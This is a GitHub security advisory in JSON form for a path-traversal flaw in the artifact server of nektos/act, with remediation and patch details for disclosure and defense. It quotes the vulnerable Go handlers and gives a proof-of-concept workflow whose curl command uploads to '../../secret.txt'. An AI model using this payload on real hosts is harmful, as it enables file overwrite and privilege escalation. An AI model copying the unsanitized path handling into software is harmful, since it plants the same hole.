{"id":"GHSA-pc99-qmg4-rcff","summary":"act vulnerable to arbitrary file upload in artifact server","details":"### Impact\nThe artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation.\n\n\n#### Issue 1: Arbitrary file upload in artifact server (GHSL-2023-004)\nThe [/upload endpoint](https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#LL103C2-L103C2) is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open.\n\n```\nrouter.PUT(\"/upload/:runId\", func(w http.ResponseWriter, req *http.Request, params httprouter.Params) {\n\t\titemPath := req.URL.Query().Get(\"itemPath\")\n\t\trunID := params.ByName(\"runId\")\n\n\t\tif req.Header.Get(\"Content-Encoding\") == \"gzip\" {\n\t\t\titemPath += gzipExtension\n\t\t}\n\n\t\tfilePath := fmt.Sprintf(\"%s/%s\", runID, itemPath)\n```\n\n#### Issue 2: Arbitrary file download in artifact server (GHSL-2023-004)\nThe [/artifact endpoint](https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#L245) is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server.\n\n```\nrouter.GET(\"/artifact/*path\", func(w http.ResponseWriter, req *http.Request, params httprouter.Params) {\n\t\tpath := params.ByName(\"path\")[1:]\n\n\t\tfile, err := fsys.Open(path)\n```\n\n#### Proof of Concept\nBelow I have written a Github Action that will upload secret.txt into the folder above the specified artifact directory. The first call to curl will create the directory named 1 if it does not already exist, and the second call to curl will upload the secret.txt file to the directory above the specified artifact directory.\n\nWhen testing this POC, the `--artifact-server-path` parameter must be passed to act in order to enable the artifact server.\nReplace yourIPandPort with the IP and port of the server. An attacker can enumerate /proc/net/tcp in order to find the artifact server IP and port, but this is out of the scope of this report. Please let me know if you would like a copy of this script.\n\n```\nname: CI\non: push\n\njobs:\n  test:\n    runs-on: ubuntu-latest\n    steps:\n    - run: echo \"Here are some secrets\" \u003e secret.txt\n    - run: curl http://\u003cyourIPandPort\u003e/upload/1?itemPath=secret.txt --upload-file secret.txt\n    - run: curl http://\u003cyourIPandPort\u003e/upload/1?itemPath=../../secret.txt --upload-file secret.txt\n```\n\n### Remediation\n1. During implementation of [Open and OpenAtEnd for FS](https://github.com/nektos/act/blob/master/pkg/artifacts/server.go#L65), please ensure to use ValidPath() to check against path traversal. See more here: https://pkg.go.dev/io/fs#FS\n2. Clean the user-provided paths manually\n\n### Patches\nVersion 0.2.40 contains a patch.\n\n### Workarounds\nAvoid use of artifact server with `--artifact-server-path`","aliases":["CVE-2023-22726","GO-2023-1504"],"modified":"2024-08-20T20:58:47.425440Z","published":"2023-01-20T16:00:36Z","database_specific":{"cwe_ids":["CWE-22","CWE-434"],"severity":"HIGH","github_reviewed_at":"2023-01-20T16:00:36Z","github_reviewed":true,"nvd_published_at":"2023-01-20T22:15:00Z"},"references":[{"type":"WEB","url":"https://github.com/nektos/act/security/advisories/GHSA-pc99-qmg4-rcff"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-22726"},{"type":"WEB","url":"https://github.com/nektos/act/issues/1553"},{"type":"WEB","url":"https://github.com/nektos/act/commit/63ae215071f94569d910964bdee866d91d6e3a10"},{"type":"PACKAGE","url":"https://github.com/nektos/act"},{"type":"WEB","url":"https://github.com/nektos/act/blob/master/pkg/artifacts/server.go#L65"},{"type":"WEB","url":"https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#L245"},{"type":"WEB","url":"https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#LL103C2-L103C2"},{"type":"WEB","url":"https://github.com/nektos/act/releases/tag/v0.2.40"},{"type":"ADVISORY","url":"https://securitylab.github.com/advisories/GHSL-2023-004_act"}],"affected":[{"package":{"name":"github.com/nektos/act","ecosystem":"Go","purl":"pkg:golang/github.com/nektos/act"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.2.40"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-pc99-qmg4-rcff/GHSA-pc99-qmg4-rcff.json","last_known_affected_version_range":"\u003c= 0.2.39"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}